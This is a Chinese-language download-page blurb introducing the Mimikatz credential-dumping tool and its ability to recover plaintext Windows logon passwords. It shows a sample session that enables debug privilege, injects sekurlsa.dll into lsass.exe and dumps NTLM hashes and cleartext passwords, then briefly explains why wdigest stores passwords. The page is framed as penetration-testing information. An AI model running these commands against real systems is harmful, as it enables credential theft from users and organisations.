
该工具mimikatz_trunk具有强大的功能。
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
该工具支持32位和64位的操作系统,但在测试过程中,至少需要以管理员权限运行。法国黑客工具Mimikatz能够直接读取目标系统的管理员密码明文,并且对Windows XP、Windows 2003、Windows 7、Windows 2008和Windows 2000等版本进行了测试。根据个人经验,它也可能适用于其他操作系统。由于没有搭建完整的测试环境,我尝试了在Windows 2008 R2 x64版本上进行测试。总而言之,这款工具功能强大且令人印象深刻,相信会有更多的黑客们对其进行深入的探索和挖掘。
作者曾计划撰写一篇关于此工具的博客文章,但未能及时完成。以下是一篇简要的介绍,重点介绍了该工具的一个非常酷的功能:Mimikatz。作者对此工具的出现表示感谢,并指出此前并未意识到能够从已登录的Windows用户中恢复其密码的清晰文本信息。这无疑对于大多数渗透测试人员来说将是一个非常有用的功能。
以下是作者提供的示例输出:
Mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */
Mimikatz # privilege::debugDemande dACTIVATION du privilège : SeDebugPrivilege : OK
Mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connecté à un client !
Message du processus : Bienvenue dans un processus distant Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
Mimikatz # @getLogonPasswords
Authentification Id : 0;434898
Package dauthentification : NTLM
Utilisateur principal : Gentil User
Domaine dauthentification : vm-w7-ult msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password tspkg : password
Authentification Id : 0;269806
Package dauthentification : NTLM
Utilisateur principal : Gentil Kiwi
Domaine dauthentification : vm-w7-ult msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a }
wdigest : waza1234/ tspkg : waza1234/
我曾好奇为什么清晰文本密码会存储在LSASS中——毕竟每个渗透测试人员都会告诉你,不需要密码来验证身份,只需要哈希值即可。一些简单的搜索表明,wdigest(密码)被要求支持HTTP Digest Authentication和其他需要验证方知道密码(而不是仅哈希值)的方案。
全部评论 (0)


